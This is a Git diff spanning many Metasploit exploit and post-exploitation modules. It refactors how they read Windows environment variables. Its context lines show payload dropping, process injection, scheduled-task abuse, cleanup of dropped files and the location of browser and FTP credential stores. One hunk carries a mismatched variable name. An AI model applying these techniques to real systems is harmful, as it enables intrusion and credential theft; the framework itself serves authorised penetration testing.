print_line("Total objects: #{objects[:values].length}")
|
||||||
|
else
|
||||||
|
print_status("The WMI query yielded no results.")
|
||||||
|
end
|
||||||
|
|
||||||
|
print_line
|
||||||
|
|
||||||
|
return true
|
||||||
|
end
|
||||||
|
|
||||||
|
end
|
||||||
|
|
||||||
|
end
|
||||||
|
end
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
|
@ -89,7 +89,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
win_file = file.gsub("/", "\\\\")
|
win_file = file.gsub("/", "\\\\")
|
||||||
if session.type == "meterpreter"
|
if session.type == "meterpreter"
|
||||||
begin
|
begin
|
||||||
wintemp = session.fs.file.expand_path("%TEMP%")
|
wintemp = session.sys.config.getenv('TEMP')
|
||||||
win_file = "#{wintemp}\\#{win_file}"
|
win_file = "#{wintemp}\\#{win_file}"
|
||||||
session.shell_command_token(%Q|attrib.exe -r "#{win_file}"|)
|
session.shell_command_token(%Q|attrib.exe -r "#{win_file}"|)
|
||||||
session.fs.file.rm(win_file)
|
session.fs.file.rm(win_file)
|
||||||
|
|
|
@ -68,13 +68,11 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
def on_new_session(session)
|
def on_new_session(session)
|
||||||
if session.type == "meterpreter"
|
if session.type == "meterpreter"
|
||||||
session.core.use("stdapi") unless session.ext.aliases.include?("stdapi")
|
session.core.use("stdapi") unless session.ext.aliases.include?("stdapi")
|
||||||
end
|
|
||||||
|
|
||||||
@dropped_files.delete_if do |file|
|
@dropped_files.delete_if do |file|
|
||||||
win_file = file.gsub("/", "\\\\")
|
win_file = file.gsub("/", "\\\\")
|
||||||
if session.type == "meterpreter"
|
|
||||||
begin
|
begin
|
||||||
wintemp = session.fs.file.expand_path("%TEMP%")
|
wintemp = session.sys.config.getenv('TEMP')
|
||||||
win_file = "#{wintemp}\\#{win_file}"
|
win_file = "#{wintemp}\\#{win_file}"
|
||||||
session.shell_command_token(%Q|attrib.exe -r "#{win_file}"|)
|
session.shell_command_token(%Q|attrib.exe -r "#{win_file}"|)
|
||||||
session.fs.file.rm(win_file)
|
session.fs.file.rm(win_file)
|
||||||
|
@ -84,7 +82,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
print_error("Failed to delete #{win_file}")
|
print_error("Failed to delete #{win_file}")
|
||||||
false
|
false
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
|
@ -74,13 +74,11 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
def on_new_session(session)
|
def on_new_session(session)
|
||||||
if session.type == "meterpreter"
|
if session.type == "meterpreter"
|
||||||
session.core.use("stdapi") unless session.ext.aliases.include?("stdapi")
|
session.core.use("stdapi") unless session.ext.aliases.include?("stdapi")
|
||||||
end
|
|
||||||
|
|
||||||
@dropped_files.each do |file|
|
@dropped_files.each do |file|
|
||||||
win_file = file.gsub("/", "\\\\")
|
win_file = file.gsub("/", "\\\\")
|
||||||
if session.type == "meterpreter"
|
|
||||||
begin
|
begin
|
||||||
wintemp = session.fs.file.expand_path("%WINDIR%")
|
wintemp = session.sys.config.getenv('WINDIR')
|
||||||
win_file = "#{wintemp}\\Temp\\#{win_file}"
|
win_file = "#{wintemp}\\Temp\\#{win_file}"
|
||||||
# Meterpreter should do this automatically as part of
|
# Meterpreter should do this automatically as part of
|
||||||
# fs.file.rm(). Until that has been implemented, remove the
|
# fs.file.rm(). Until that has been implemented, remove the
|
||||||
|
@ -93,7 +91,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
print_error("Failed to delete #{win_file}")
|
print_error("Failed to delete #{win_file}")
|
||||||
false
|
false
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
|
@ -169,4 +166,4 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
|
@ -72,13 +72,11 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
def on_new_session(session)
|
def on_new_session(session)
|
||||||
if session.type == "meterpreter"
|
if session.type == "meterpreter"
|
||||||
session.core.use("stdapi") unless session.ext.aliases.include?("stdapi")
|
session.core.use("stdapi") unless session.ext.aliases.include?("stdapi")
|
||||||
end
|
|
||||||
|
|
||||||
@dropped_files.delete_if do |file|
|
@dropped_files.delete_if do |file|
|
||||||
win_file = file.gsub("/", "\\\\")
|
win_file = file.gsub("/", "\\\\")
|
||||||
if session.type == "meterpreter"
|
|
||||||
begin
|
begin
|
||||||
wintemp = session.fs.file.expand_path("%TEMP%")
|
wintemp = session.sys.config.getenv('TEMP')
|
||||||
win_file = "#{wintemp}\\#{win_file}"
|
win_file = "#{wintemp}\\#{win_file}"
|
||||||
# Meterpreter should do this automatically as part of
|
# Meterpreter should do this automatically as part of
|
||||||
# fs.file.rm(). Until that has been implemented, remove the
|
# fs.file.rm(). Until that has been implemented, remove the
|
||||||
|
@ -91,7 +89,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
print_error("Failed to delete #{win_file}")
|
print_error("Failed to delete #{win_file}")
|
||||||
false
|
false
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
|
@ -184,4 +181,4 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
|
@ -66,13 +66,11 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
def on_new_session(session)
|
def on_new_session(session)
|
||||||
if session.type == "meterpreter"
|
if session.type == "meterpreter"
|
||||||
session.core.use("stdapi") unless session.ext.aliases.include?("stdapi")
|
session.core.use("stdapi") unless session.ext.aliases.include?("stdapi")
|
||||||
end
|
|
||||||
|
|
||||||
@dropped_files.delete_if do |file|
|
@dropped_files.delete_if do |file|
|
||||||
win_file = file.gsub("/", "\\\\")
|
win_file = file.gsub("/", "\\\\")
|
||||||
if session.type == "meterpreter"
|
|
||||||
begin
|
begin
|
||||||
wintemp = session.fs.file.expand_path("%TEMP%")
|
wintemp = session.sys.config.getenv('TEMP')
|
||||||
win_file = "#{wintemp}\\#{win_file}"
|
win_file = "#{wintemp}\\#{win_file}"
|
||||||
session.shell_command_token(%Q|attrib.exe -r "#{win_file}"|)
|
session.shell_command_token(%Q|attrib.exe -r "#{win_file}"|)
|
||||||
session.fs.file.rm(win_file)
|
session.fs.file.rm(win_file)
|
||||||
|
@ -82,7 +80,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
print_error("Failed to delete #{win_file}")
|
print_error("Failed to delete #{win_file}")
|
||||||
false
|
false
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
@ -257,4 +254,4 @@ This code allows to launch other executables with user data provided as argument
|
||||||
solution because it allows to pass URL's as arguments. And code executed by mshta is on a privileged zone. Other
|
solution because it allows to pass URL's as arguments. And code executed by mshta is on a privileged zone. Other
|
||||||
executables allow to provide SMB URI's but metasploit only allow to 'simulate' a SMB resource through webdav, so
|
executables allow to provide SMB URI's but metasploit only allow to 'simulate' a SMB resource through webdav, so
|
||||||
the target should have the WebClient service enabled, which is only enabled by default on XP SP3.
|
the target should have the WebClient service enabled, which is only enabled by default on XP SP3.
|
||||||
=end
|
=end
|
||||||
|
|
|
@ -98,7 +98,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
# Use the system path for executable to run except the wordpad
|
# Use the system path for executable to run except the wordpad
|
||||||
if client.sys.config.sysinfo["OS"] =~ /Windows XP/
|
if client.sys.config.sysinfo["OS"] =~ /Windows XP/
|
||||||
windir = client.fs.file.expand_path("%ProgramFiles%")
|
windir = client.sys.config.getenv('ProgramFiles')
|
||||||
cmd="#{windir}\\Windows NT\\Accessories\\wordpad.exe"
|
cmd="#{windir}\\Windows NT\\Accessories\\wordpad.exe"
|
||||||
else # Windows 2000
|
else # Windows 2000
|
||||||
cmd = "notepad.exe"
|
cmd = "notepad.exe"
|
||||||
|
|
|
@ -76,7 +76,7 @@ class Metasploit3 < Msf::Exploit::Local
|
||||||
# Usint this solution atm because I'm experiencing problems with railgun when trying
|
# Usint this solution atm because I'm experiencing problems with railgun when trying
|
||||||
# use GetTokenInformation
|
# use GetTokenInformation
|
||||||
def low_integrity_level?
|
def low_integrity_level?
|
||||||
tmp_dir = expand_path("%TEMP%")
|
tmp_dir = session.sys.config.getenv('TEMP')
|
||||||
cd(tmp_dir)
|
cd(tmp_dir)
|
||||||
new_dir = "#{rand_text_alpha(5)}"
|
new_dir = "#{rand_text_alpha(5)}"
|
||||||
begin
|
begin
|
||||||
|
|
|
@ -137,7 +137,7 @@ class Metasploit3 < Msf::Exploit::Local
|
||||||
if datastore["WritableDir"] and not datastore["WritableDir"].empty?
|
if datastore["WritableDir"] and not datastore["WritableDir"].empty?
|
||||||
temp_dir = datastore["WritableDir"]
|
temp_dir = datastore["WritableDir"]
|
||||||
else
|
else
|
||||||
temp_dir = expand_path("%TEMP%")
|
temp_dir = client.sys.config.getenv('TEMP')
|
||||||
end
|
end
|
||||||
|
|
||||||
print_status("Using #{temp_dir} to drop malicious DLL...")
|
print_status("Using #{temp_dir} to drop malicious DLL...")
|
||||||
|
|
|
@ -80,7 +80,7 @@ class Metasploit3 < Msf::Exploit::Local
|
||||||
if datastore["PATH"]
|
if datastore["PATH"]
|
||||||
payload_path = datastore["PATH"]
|
payload_path = datastore["PATH"]
|
||||||
else
|
else
|
||||||
payload_path = session.fs.file.expand_path("%TEMP%")
|
payload_path = session.sys.config.getenv('TEMP')
|
||||||
end
|
end
|
||||||
|
|
||||||
cmd_location = "#{payload_path}\\#{payload_filename}"
|
cmd_location = "#{payload_path}\\#{payload_filename}"
|
||||||
|
|
|
@ -42,7 +42,6 @@ class Metasploit3 < Msf::Exploit::Local
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
||||||
def check_permissions!
|
def check_permissions!
|
||||||
# Check if you are an admin
|
# Check if you are an admin
|
||||||
vprint_status('Checking admin status...')
|
vprint_status('Checking admin status...')
|
||||||
|
|
|
@ -76,7 +76,7 @@ class Metasploit3 < Msf::Exploit::Local
|
||||||
|
|
||||||
# Build a random name for the share and directory
|
# Build a random name for the share and directory
|
||||||
share_name = Rex::Text.rand_text_alphanumeric(8)
|
share_name = Rex::Text.rand_text_alphanumeric(8)
|
||||||
drive = session.fs.file.expand_path("%SYSTEMDRIVE%")
|
drive = session.sys.config.getenv('SYSTEMDRIVE')
|
||||||
share_dir = "#{drive}\\#{share_name}"
|
share_dir = "#{drive}\\#{share_name}"
|
||||||
|
|
||||||
# Create them
|
# Create them
|
||||||
|
|
|
@ -93,7 +93,7 @@ class Metasploit3 < Msf::Exploit::Local
|
||||||
cmd = datastore["CMD"] || nil
|
cmd = datastore["CMD"] || nil
|
||||||
upload_fn = nil
|
upload_fn = nil
|
||||||
|
|
||||||
tempdir = session.fs.file.expand_path("%TEMP%")
|
tempdir = session.sys.config.getenv('TEMP')
|
||||||
if not cmd
|
if not cmd
|
||||||
# Get the exe payload.
|
# Get the exe payload.
|
||||||
exe = generate_payload_exe
|
exe = generate_payload_exe
|
||||||
|
@ -111,7 +111,7 @@ class Metasploit3 < Msf::Exploit::Local
|
||||||
# Create a new task to do our bidding, but make sure it doesn't run.
|
# Create a new task to do our bidding, but make sure it doesn't run.
|
||||||
#
|
#
|
||||||
taskname ||= Rex::Text.rand_text_alphanumeric(8+rand(8))
|
taskname ||= Rex::Text.rand_text_alphanumeric(8+rand(8))
|
||||||
sysdir = session.fs.file.expand_path("%SystemRoot%")
|
sysdir = session.sys.config.getenv('SystemRoot')
|
||||||
taskfile = "#{sysdir}\\system32\\tasks\\#{taskname}"
|
taskfile = "#{sysdir}\\system32\\tasks\\#{taskname}"
|
||||||
|
|
||||||
print_status("Creating task: #{taskname}")
|
print_status("Creating task: #{taskname}")
|
||||||
|
|
|
@ -72,7 +72,7 @@ class Metasploit3 < Msf::Exploit::Local
|
||||||
end
|
end
|
||||||
|
|
||||||
def low_integrity_level?
|
def low_integrity_level?
|
||||||
tmp_dir = expand_path("%USERPROFILE%")
|
tmp_dir = session.sys.config.getenv('USERPROFILE')
|
||||||
cd(tmp_dir)
|
cd(tmp_dir)
|
||||||
new_dir = "#{rand_text_alpha(5)}"
|
new_dir = "#{rand_text_alpha(5)}"
|
||||||
begin
|
begin
|
||||||
|
@ -133,7 +133,7 @@ class Metasploit3 < Msf::Exploit::Local
|
||||||
if datastore['TECHNIQUE'] == 'FILE'
|
if datastore['TECHNIQUE'] == 'FILE'
|
||||||
payload_file = "#{rand_text_alpha(5+rand(3))}.exe"
|
payload_file = "#{rand_text_alpha(5+rand(3))}.exe"
|
||||||
begin
|
begin
|
||||||
tmp_dir = expand_path("%TEMP%")
|
tmp_dir = session.sys.config.getenv('TEMP')
|
||||||
tmp_dir << "\\Low" unless tmp_dir[-3,3] =~ /Low/i
|
tmp_dir << "\\Low" unless tmp_dir[-3,3] =~ /Low/i
|
||||||
cd(tmp_dir)
|
cd(tmp_dir)
|
||||||
print_status("Trying to drop payload to #{tmp_dir}...")
|
print_status("Trying to drop payload to #{tmp_dir}...")
|
||||||
|
@ -186,7 +186,7 @@ class Metasploit3 < Msf::Exploit::Local
|
||||||
|
|
||||||
# Spawn low integrity cmd.exe
|
# Spawn low integrity cmd.exe
|
||||||
print_status("Spawning Low Integrity Cmd Prompt")
|
print_status("Spawning Low Integrity Cmd Prompt")
|
||||||
windir = client.fs.file.expand_path("%windir%")
|
windir = session.sys.config.getenv('windir')
|
||||||
li_cmd_pid = client.sys.process.execute("#{windir}\\system32\\cmd.exe", nil, {'Hidden' => false }).pid
|
li_cmd_pid = client.sys.process.execute("#{windir}\\system32\\cmd.exe", nil, {'Hidden' => false }).pid
|
||||||
|
|
||||||
count = count_cmd_procs
|
count = count_cmd_procs
|
||||||
|
|
|
@ -193,7 +193,7 @@ class Metasploit3 < Msf::Exploit::Local
|
||||||
end
|
end
|
||||||
|
|
||||||
def create_proc
|
def create_proc
|
||||||
windir = expand_path("%windir%")
|
windir = session.sys.config.getenv('windir')
|
||||||
cmd = "#{windir}\\System32\\notepad.exe"
|
cmd = "#{windir}\\System32\\notepad.exe"
|
||||||
# run hidden
|
# run hidden
|
||||||
begin
|
begin
|
||||||
|
|
|
@ -139,7 +139,7 @@ class Metasploit3 < Msf::Exploit::Local
|
||||||
|
|
||||||
print_status("Launching notepad to host the exploit...")
|
print_status("Launching notepad to host the exploit...")
|
||||||
|
|
||||||
windir = expand_path("%windir%")
|
windir = session.sys.config.getenv('windir')
|
||||||
cmd = "#{windir}\\SysWOW64\\notepad.exe"
|
cmd = "#{windir}\\SysWOW64\\notepad.exe"
|
||||||
process = client.sys.process.execute(cmd, nil, {'Hidden' => true})
|
process = client.sys.process.execute(cmd, nil, {'Hidden' => true})
|
||||||
host_process = client.sys.process.open(process.pid, PROCESS_ALL_ACCESS)
|
host_process = client.sys.process.open(process.pid, PROCESS_ALL_ACCESS)
|
||||||
|
|
|
@ -117,7 +117,7 @@ class Metasploit3 < Msf::Exploit::Local
|
||||||
# Creates a temp notepad.exe to inject payload in to given the payload
|
# Creates a temp notepad.exe to inject payload in to given the payload
|
||||||
# Returns process PID
|
# Returns process PID
|
||||||
def create_temp_proc()
|
def create_temp_proc()
|
||||||
windir = client.fs.file.expand_path("%windir%")
|
windir = client.sys.config.getenv('windir')
|
||||||
# Select path of executable to run depending the architecture
|
# Select path of executable to run depending the architecture
|
||||||
if @payload_arch.first== "x86" and client.platform =~ /x86/
|
if @payload_arch.first== "x86" and client.platform =~ /x86/
|
||||||
cmd = "#{windir}\\System32\\notepad.exe"
|
cmd = "#{windir}\\System32\\notepad.exe"
|
||||||
|
|
|
@ -130,7 +130,7 @@ class Metasploit3 < Msf::Exploit::Local
|
||||||
|
|
||||||
# Writes script to target host
|
# Writes script to target host
|
||||||
def write_script_to_target(vbs,name)
|
def write_script_to_target(vbs,name)
|
||||||
tempdir = expand_path("%TEMP%")
|
tempdir = session.sys.config.getenv('TEMP')
|
||||||
if name == nil
|
if name == nil
|
||||||
tempvbs = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".vbs"
|
tempvbs = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".vbs"
|
||||||
else
|
else
|
||||||
|
|
|
@ -78,7 +78,7 @@ class Metasploit3 < Msf::Exploit::Local
|
||||||
def check
|
def check
|
||||||
os = sysinfo["OS"]
|
os = sysinfo["OS"]
|
||||||
if os =~ /windows/i
|
if os =~ /windows/i
|
||||||
file_path = expand_path("%windir%") << "\\system32\\win32k.sys"
|
file_path = session.sys.config.getenv('windir') << "\\system32\\win32k.sys"
|
||||||
major, minor, build, revision, branch = file_version(file_path)
|
major, minor, build, revision, branch = file_version(file_path)
|
||||||
vprint_status("win32k.sys file version: #{major}.#{minor}.#{build}.#{revision}")
|
vprint_status("win32k.sys file version: #{major}.#{minor}.#{build}.#{revision}")
|
||||||
|
|
||||||
|
|
|
@ -115,7 +115,7 @@ class Metasploit3 < Msf::Exploit::Local
|
||||||
# Returns path for XML and payload
|
# Returns path for XML and payload
|
||||||
def generate_path(rexename)
|
def generate_path(rexename)
|
||||||
# Generate a path to write payload and XML
|
# Generate a path to write payload and XML
|
||||||
path = datastore['PATH'] || expand_path("%TEMP%")
|
path = datastore['PATH'] || session.sys.config.getenv('TEMP')
|
||||||
xml_path = "#{path}\\#{Rex::Text.rand_text_alpha((rand(8)+6))}.xml"
|
xml_path = "#{path}\\#{Rex::Text.rand_text_alpha((rand(8)+6))}.xml"
|
||||||
rexe_path = "#{path}\\#{rexename}"
|
rexe_path = "#{path}\\#{rexename}"
|
||||||
return xml_path,rexe_path
|
return xml_path,rexe_path
|
||||||
|
|
|
@ -59,8 +59,9 @@ class Metasploit3 < Msf::Exploit::Local
|
||||||
|
|
||||||
exe = Msf::Util::EXE.to_win32pe_service(session.framework, raw)
|
exe = Msf::Util::EXE.to_win32pe_service(session.framework, raw)
|
||||||
|
|
||||||
sysdir = session.fs.file.expand_path("%SystemRoot%")
|
dir_env = session.sys.config.getenvs('SystemRoot', 'TEMP')
|
||||||
tmpdir = session.fs.file.expand_path("%TEMP%")
|
sysdir = dir_env['SystemRoot']
|
||||||
|
tmpdir = dir_env['TEMP']
|
||||||
|
|
||||||
print_status("Meterpreter stager executable #{exe.length} bytes long being uploaded..")
|
print_status("Meterpreter stager executable #{exe.length} bytes long being uploaded..")
|
||||||
begin
|
begin
|
||||||
|
@ -122,7 +123,7 @@ class Metasploit3 < Msf::Exploit::Local
|
||||||
moved = false
|
moved = false
|
||||||
configed = false
|
configed = false
|
||||||
#default path, but there should be an ImagePath registry key
|
#default path, but there should be an ImagePath registry key
|
||||||
source = session.fs.file.expand_path("%SYSTEMROOT%\\system32\\#{serv}.exe")
|
source = "#{sysdir}\\system32\\#{serv}.exe"
|
||||||
#get path to exe; parse out quotes and arguments
|
#get path to exe; parse out quotes and arguments
|
||||||
sourceorig = registry_getvaldata("#{serviceskey}\\#{serv}","ImagePath").to_s
|
sourceorig = registry_getvaldata("#{serviceskey}\\#{serv}","ImagePath").to_s
|
||||||
sourcemaybe = session.fs.file.expand_path(sourceorig)
|
sourcemaybe = session.fs.file.expand_path(sourceorig)
|
||||||
|
|
|
@ -190,7 +190,7 @@ Processor-Speed=#{processor_speed}
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
win_temp = client.fs.file.expand_path("%TEMP%")
|
win_temp = client.sys.config.getenv('TEMP')
|
||||||
win_file = "#{win_temp}\\#{payload_exe}"
|
win_file = "#{win_temp}\\#{payload_exe}"
|
||||||
print_status("Attempting to delete #{win_file} ...")
|
print_status("Attempting to delete #{win_file} ...")
|
||||||
client.shell_command_token(%Q|attrib.exe -r #{win_file}|)
|
client.shell_command_token(%Q|attrib.exe -r #{win_file}|)
|
||||||
|
|
|
@ -77,7 +77,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
begin
|
begin
|
||||||
print_good("Deleting the VBS payload \"#{@var_vbs_name}.vbs\" ...")
|
print_good("Deleting the VBS payload \"#{@var_vbs_name}.vbs\" ...")
|
||||||
windir = client.fs.file.expand_path("%WINDIR%")
|
windir = client.sys.config.getenv('WINDIR')
|
||||||
client.fs.file.rm("#{windir}\\system32\\" + @var_vbs_name + ".vbs")
|
client.fs.file.rm("#{windir}\\system32\\" + @var_vbs_name + ".vbs")
|
||||||
print_good("Deleting the MOF file \"#{@var_mof_name}.mof\" ...")
|
print_good("Deleting the MOF file \"#{@var_mof_name}.mof\" ...")
|
||||||
cmd = "#{windir}\\system32\\attrib.exe -r " +
|
cmd = "#{windir}\\system32\\attrib.exe -r " +
|
||||||
|
|
|
@ -92,7 +92,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
win_file = file.gsub("/", "\\\\")
|
win_file = file.gsub("/", "\\\\")
|
||||||
if session.type == "meterpreter"
|
if session.type == "meterpreter"
|
||||||
begin
|
begin
|
||||||
windir = session.fs.file.expand_path("%WINDIR%")
|
windir = session.sys.config.getenv('WINDIR')
|
||||||
win_file = "#{windir}\\system32\\#{win_file}"
|
win_file = "#{windir}\\system32\\#{win_file}"
|
||||||
# Meterpreter should do this automatically as part of
|
# Meterpreter should do this automatically as part of
|
||||||
# fs.file.rm(). Until that has been implemented, remove the
|
# fs.file.rm(). Until that has been implemented, remove the
|
||||||
|
|
|
@ -45,7 +45,7 @@ class Metasploit3 < Msf::Post
|
||||||
end
|
end
|
||||||
|
|
||||||
def exists_exe?(exe)
|
def exists_exe?(exe)
|
||||||
path = expand_path("$PATH")
|
path = session.sys.config.getenv("PATH")
|
||||||
if path.nil? or path.empty?
|
if path.nil? or path.empty?
|
||||||
return false
|
return false
|
||||||
end
|
end
|
||||||
|
|
|
@ -43,7 +43,7 @@ class Metasploit3 < Msf::Post
|
||||||
paths = enum_users_unix
|
paths = enum_users_unix
|
||||||
when /win/
|
when /win/
|
||||||
@platform = :windows
|
@platform = :windows
|
||||||
drive = session.fs.file.expand_path("%SystemDrive%")
|
drive = session.sys.config.getenv('SystemDrive')
|
||||||
os = session.sys.config.sysinfo['OS']
|
os = session.sys.config.sysinfo['OS']
|
||||||
|
|
||||||
if os =~ /Windows 7|Vista|2008/
|
if os =~ /Windows 7|Vista|2008/
|
||||||
|
@ -265,7 +265,7 @@ class Metasploit3 < Msf::Post
|
||||||
|
|
||||||
def whoami
|
def whoami
|
||||||
if @platform == :windows
|
if @platform == :windows
|
||||||
session.fs.file.expand_path("%USERNAME%")
|
session.sys.config.getenv('USERNAME')
|
||||||
else
|
else
|
||||||
session.shell_command("whoami").chomp
|
session.shell_command("whoami").chomp
|
||||||
end
|
end
|
||||||
|
|
|
@ -54,9 +54,8 @@ class Metasploit3 < Msf::Post
|
||||||
var_names << registry_enumvals("HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment")
|
var_names << registry_enumvals("HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment")
|
||||||
output = []
|
output = []
|
||||||
var_names.delete(nil)
|
var_names.delete(nil)
|
||||||
var_names.flatten.uniq.sort.each do |v|
|
session.sys.config.getenvs(*var_names.flatten.uniq.sort).each do |k, v|
|
||||||
# Emulate the output of set and env, e.g. VAR=VALUE
|
output << "#{k}=#{v}"
|
||||||
output << "#{v}=#{session.fs.file.expand_path("\%#{v}\%")}"
|
|
||||||
end
|
end
|
||||||
@output = output.join("\n")
|
@output = output.join("\n")
|
||||||
@ltype = "windows.environment"
|
@ltype = "windows.environment"
|
||||||
|
|
|
@ -240,7 +240,7 @@ class Metasploit3 < Msf::Post
|
||||||
|
|
||||||
def whoami
|
def whoami
|
||||||
if @platform == :windows
|
if @platform == :windows
|
||||||
session.fs.file.expand_path("%USERNAME%")
|
session.sys.config.getenv('USERNAME')
|
||||||
else
|
else
|
||||||
session.shell_command("whoami").chomp
|
session.shell_command("whoami").chomp
|
||||||
end
|
end
|
||||||
|
|
|
@ -277,7 +277,6 @@ class Metasploit3 < Msf::Post
|
||||||
def get_ff_and_loot_path
|
def get_ff_and_loot_path
|
||||||
@paths = {}
|
@paths = {}
|
||||||
check_paths = []
|
check_paths = []
|
||||||
drive = expand_path("%SystemDrive%")
|
|
||||||
loot_file = Rex::Text::rand_text_alpha(6) + ".txt"
|
loot_file = Rex::Text::rand_text_alpha(6) + ".txt"
|
||||||
|
|
||||||
case @platform
|
case @platform
|
||||||
|
@ -286,7 +285,9 @@ class Metasploit3 < Msf::Post
|
||||||
print_error("You need root privileges on this platform for DECRYPT option")
|
print_error("You need root privileges on this platform for DECRYPT option")
|
||||||
return false
|
return false
|
||||||
end
|
end
|
||||||
tmpdir = expand_path("%TEMP%") + "\\"
|
env_vars = session.sys.config.getenvs('TEMP', 'SystemDrive')
|
||||||
|
tmpdir = env_vars['TEMP'] + "\\"
|
||||||
|
drive = env_vars['SystemDrive']
|
||||||
# this way allows for more independent use of meterpreter
|
# this way allows for more independent use of meterpreter
|
||||||
# payload (32 and 64 bit) and cleaner code
|
# payload (32 and 64 bit) and cleaner code
|
||||||
check_paths << drive + '\\Program Files\\Mozilla Firefox\\'
|
check_paths << drive + '\\Program Files\\Mozilla Firefox\\'
|
||||||
|
@ -643,9 +644,9 @@ class Metasploit3 < Msf::Post
|
||||||
|
|
||||||
def whoami
|
def whoami
|
||||||
if @platform == :windows
|
if @platform == :windows
|
||||||
return session.fs.file.expand_path("%USERNAME%")
|
session.sys.config.getenv('USERNAME')
|
||||||
else
|
else
|
||||||
return session.shell_command("whoami").chomp
|
session.shell_command("whoami").chomp
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
|
@ -307,7 +307,7 @@ class Metasploit3 < Msf::Post
|
||||||
|
|
||||||
def whoami
|
def whoami
|
||||||
if @platform == :windows
|
if @platform == :windows
|
||||||
session.fs.file.expand_path("%USERNAME%")
|
session.sys.config.getenv('USERNAME')
|
||||||
else
|
else
|
||||||
session.shell_command("whoami").chomp
|
session.shell_command("whoami").chomp
|
||||||
end
|
end
|
||||||
|
|
|
@ -50,7 +50,7 @@ class Metasploit3 < Msf::Post
|
||||||
base = "/Users/#{user}/Library/Thunderbird/Profiles/"
|
base = "/Users/#{user}/Library/Thunderbird/Profiles/"
|
||||||
when /win/
|
when /win/
|
||||||
if session.type =~ /meterpreter/
|
if session.type =~ /meterpreter/
|
||||||
user_profile = session.fs.file.expand_path("%APPDATA%")
|
user_profile = session.sys.config.getenv('APPDATA')
|
||||||
else
|
else
|
||||||
user_profile = cmd_exec("echo %APPDATA%").strip
|
user_profile = cmd_exec("echo %APPDATA%").strip
|
||||||
end
|
end
|
||||||
|
|
|
@ -176,7 +176,7 @@ EOS
|
||||||
ring0_code.gsub!('TPTP', [pid].pack('V'))
|
ring0_code.gsub!('TPTP', [pid].pack('V'))
|
||||||
|
|
||||||
# Create the malicious Keyboard Layout file...
|
# Create the malicious Keyboard Layout file...
|
||||||
tmpdir = session.fs.file.expand_path("%TEMP%")
|
tmpdir = session.sys.config.getenv('TEMP')
|
||||||
fname = "p0wns.boom"
|
fname = "p0wns.boom"
|
||||||
dllpath = "#{tmpdir}\\#{fname}"
|
dllpath = "#{tmpdir}\\#{fname}"
|
||||||
fd = session.fs.file.new(dllpath, 'wb')
|
fd = session.fs.file.new(dllpath, 'wb')
|
||||||
|
|
|
@ -41,7 +41,7 @@ class Metasploit3 < Msf::Post
|
||||||
paths = []
|
paths = []
|
||||||
services = []
|
services = []
|
||||||
vuln = ""
|
vuln = ""
|
||||||
@temp = session.fs.file.expand_path("%TEMP%")
|
@temp = session.sys.config.getenv('TEMP')
|
||||||
|
|
||||||
if init_railgun() == :error
|
if init_railgun() == :error
|
||||||
return
|
return
|
||||||
|
|
|
@ -233,12 +233,14 @@ class Metasploit3 < Msf::Post
|
||||||
|
|
||||||
print_status("Searching BulletProof FTP Client installation directory...")
|
print_status("Searching BulletProof FTP Client installation directory...")
|
||||||
# BulletProof FTP Client 2.6 uses the installation dir to store bookmarks files
|
# BulletProof FTP Client 2.6 uses the installation dir to store bookmarks files
|
||||||
program_files_x86 = expand_path('%ProgramFiles(X86)%')
|
progfiles_env = session.sys.config.getenvs('ProgramFiles(X86)', 'ProgramFiles')
|
||||||
if not program_files_x86.empty? and program_files_x86 !~ /%ProgramFiles\(X86\)%/
|
progfilesx86 = prog_files_env['ProgramFiles(X86)']
|
||||||
program_files = program_files_x86 #x64
|
if not progfilesx86.empty? and progfilesx86 !~ /%ProgramFiles\(X86\)%/
|
||||||
|
program_files = progfilesx86 # x64
|
||||||
else
|
else
|
||||||
program_files = expand_path('%ProgramFiles%') #x86
|
program_files = progfiles_env['ProgramFiles'] # x86
|
||||||
end
|
end
|
||||||
|
|
||||||
session.fs.dir.foreach(program_files) do |dir|
|
session.fs.dir.foreach(program_files) do |dir|
|
||||||
if dir =~ /BulletProof FTP Client/
|
if dir =~ /BulletProof FTP Client/
|
||||||
vprint_status("BulletProof Installation directory found at #{program_files}\\#{dir}")
|
vprint_status("BulletProof Installation directory found at #{program_files}\\#{dir}")
|
||||||
|
|
|
@ -33,7 +33,7 @@ class Metasploit3 < Msf::Post
|
||||||
return
|
return
|
||||||
end
|
end
|
||||||
|
|
||||||
drive = session.fs.file.expand_path("%SystemDrive%")
|
drive = session.sys.config.getenv('SystemDrive')
|
||||||
case session.platform
|
case session.platform
|
||||||
when /win64/i
